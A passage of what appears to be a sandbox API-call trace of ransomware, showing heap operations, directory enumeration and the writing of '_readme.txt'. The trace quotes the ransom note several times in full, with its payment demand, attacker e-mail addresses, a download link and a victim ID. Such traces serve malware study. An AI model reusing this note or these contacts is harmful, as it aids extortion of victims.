(HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.893] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0200.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.893] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.893] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.893] PathFindFileNameW (pszPath="") returned="" [0200.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.893] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.893] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0200.894] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b67060 [0200.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.894] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.894] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0200.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0200.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.894] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 0 [0200.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b67060 [0200.895] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.895] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0200.895] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\_readme.txt" (normalized: "c:\\boot\\pt-br\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0200.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67060 | out: hHeap=0x2c0000) returned 1 [0200.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.896] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.896] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.896] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0200.896] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0200.896] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0200.896] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 